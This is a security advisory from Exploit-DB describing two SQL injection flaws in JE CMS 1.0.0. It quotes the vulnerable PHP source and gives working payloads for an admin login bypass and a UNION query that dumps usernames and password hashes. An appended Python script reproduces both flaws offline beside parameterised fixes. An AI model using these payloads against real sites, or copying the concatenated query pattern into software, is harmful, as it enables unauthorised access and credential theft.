JE CMS 1.0.0 – Authentication Bypass

  • Author: Abysssec
    Date: 2010-09-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15141/
  • '''
    ________ __ ____
     |\/|/ __ \ /\| || |_ \ 
     | \/ | || | /\ | || | |_) |
     | |\/| | || |/ /\ \| || |_ < 
     | || | |__| / ____ \ |__| | |_) |
     |_||_|\____/_/\_\____/|____/ 
    
    http://www.exploit-db.com/moaub-28-je-cms-1-0-0-bypass-authentication-by-sql-injection-vulnerability/
    '''
    
     
    Title: JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability
    Affected version: JE CMS <= 1.0.0
    Vendor site: joenasejes.cz.cc
    Discovery: abysssec.com
    
    Vulnerabilities:
    
    1. Bypass Authentication by SQL Injection Vulnerability
    
    In administrator\login.php, lines 16-20, the request parameters are read without any validation and the login routine is invoked:
    if (isset($_REQUEST['username'])) {
    	$username = $_REQUEST['username'];
    	$password = $_REQUEST['password'];
    	$result = $core->userLogin();

    userLogin() is defined in administrator\library\functions.php. Lines 129-139 build the query by concatenating the raw username straight into the SQL string (the "// vulnerability is here" markers are the advisory's annotations, not part of the original source):
    		if ($userName == '' || $password == '') {
    			$errorMessage = JE_MISMATCH_USERNAME_PASSWORD;
    		}else {
    			// check the database and see if the username and password combo do match
    			$sql = "SELECT userid
    					FROM users 
    					WHERE username = '".$userName."' 		// vulnerability is here
    					AND password = '".$this->getHash($password)."'	// vulnerability is here
    					AND usertype = 1
    					AND block = 0";
    			$result = $this->JEQuery($sql);
    
    PoC:
    
    In administrator/login.php, submit:
    
    username: admin' or '1'='1
    password: admin' or '1'='1
    
    Only the username payload matters: the password is passed through getHash() before it reaches the query, so whatever is typed there is hashed into an inert string. The resulting WHERE clause is
    
    	username = 'admin' or '1'='1' AND password = '<hash>' AND usertype = 1 AND block = 0
    
    and because AND binds tighter than OR, the row whose username is 'admin' satisfies the clause on the first term alone, regardless of the password, usertype or block value. The username therefore has to name an existing administrator account; 'admin' is the guess used here.
    
    2. SQL injection in administrator\index.php via the "userid" parameter:
    
    in administrator\index.php file line 12:
    $userid			= 	$_REQUEST['userid'];
    lines 52-53:
    	case 'edituser' :
    		$user = $core->getUser($userid);
    		
    getUser() is defined in administrator\library\functions.php, lines 578-583. The id is concatenated into a numeric comparison without quoting, so the payload needs no quote character to break out:
    
    	function getUser($id){
    		
    		$sql = "SELECT *
    				FROM users
    				WHERE userid = ".$id;	// vulnerability is here
    		$result = $this->JEQuery($sql);
    
    PoC:
    
    http://site/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--
    
    "1 and 1=2" makes the original SELECT return no rows, so only the UNION row comes back; its 12 columns match SELECT * over the users table, and the concatenated username:password pairs (0x3a is a colon in MySQL) land in the fifth column, which the edituser form then renders. The page lives under administrator/, so where it enforces a login the bypass above supplies one.
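Both query-building patterns above, modelled in Python over an in-memory SQLite database so the effect of each payload can be run offline. This is an added example, not code from JE CMS or from the advisory: getHash() is assumed to be plain MD5 (the page does not say what it is), the users table is a constructed six-column stand-in for the real twelve-column one, and the UNION payload is rewritten for SQLite (|| instead of 0x3a, six columns instead of twelve). Each vulnerable function sits beside a parameterised version that rejects the same payload.

```python
import hashlib
import sqlite3

# Assumption: stand-in for JE CMS's getHash(); the advisory does not say what
# the real function does, so plain MD5 is used here purely for illustration.
def get_hash(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()

def make_db() -> sqlite3.Connection:
    """Constructed sample data: a six-column users table (the real table has
    twelve columns, judging by the UNION payload in the advisory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, usertype INTEGER, block INTEGER, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1, "admin", get_hash("s3cret"), 1, 0, "admin@example.invalid"),
            (2, "editor", get_hash("editorpass"), 1, 0, "editor@example.invalid"),
            (3, "blocked", get_hash("nope"), 1, 1, "blocked@example.invalid"),
        ],
    )
    return conn

# --- Vulnerability 1: userLogin() query built by string concatenation -------

def vulnerable_login_sql(username: str, password: str) -> str:
    # Same shape as functions.php lines 129-139: the username is interpolated
    # raw, the password is hashed first, so only the username is injectable.
    return (
        "SELECT userid FROM users "
        f"WHERE username = '{username}' "
        f"AND password = '{get_hash(password)}' "
        "AND usertype = 1 AND block = 0"
    )

def vulnerable_login(conn, username, password):
    row = conn.execute(vulnerable_login_sql(username, password)).fetchone()
    return row[0] if row else None

def safe_login(conn, username, password):
    # Bound parameters: the quote in the username is data, not SQL syntax.
    row = conn.execute(
        "SELECT userid FROM users WHERE username = ? AND password = ? "
        "AND usertype = 1 AND block = 0",
        (username, get_hash(password)),
    ).fetchone()
    return row[0] if row else None

# --- Vulnerability 2: getUser() with an unquoted numeric parameter ----------

def vulnerable_get_user(conn, userid):
    # Same shape as functions.php lines 578-583: $id concatenated unquoted.
    return conn.execute(f"SELECT * FROM users WHERE userid = {userid}").fetchone()

def safe_get_user(conn, userid):
    # Coerce to int first; anything that is not a bare integer is rejected
    # before it can reach the query, and the value is bound, not concatenated.
    try:
        uid = int(userid)
    except (TypeError, ValueError):
        return None
    return conn.execute("SELECT * FROM users WHERE userid = ?", (uid,)).fetchone()

# The advisory's payloads. The UNION one is adapted to SQLite and to the
# six-column constructed table; '1 and 1=2' empties the original SELECT so
# only the UNION row, carrying every username:password pair, is returned.
BYPASS_USERNAME = "admin' or '1'='1"
UNION_PAYLOAD = (
    "1 and 1=2 UNION SELECT 1,2,group_concat(username || ':' || password),"
    "4,5,6 FROM users--"
)

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login_sql(BYPASS_USERNAME, "anything"))
    print("vulnerable login  ->", vulnerable_login(db, BYPASS_USERNAME, "anything"))
    print("safe login        ->", safe_login(db, BYPASS_USERNAME, "anything"))
    print("vulnerable getUser->", vulnerable_get_user(db, UNION_PAYLOAD))
    print("safe getUser      ->", safe_get_user(db, UNION_PAYLOAD))
```

Running the script prints the injected login query, shows the vulnerable login returning userid 1 for the bypass username with a wrong password while the bound version returns nothing, and shows the UNION payload pulling every username:password pair through getUser() while the integer-coerced version returns nothing.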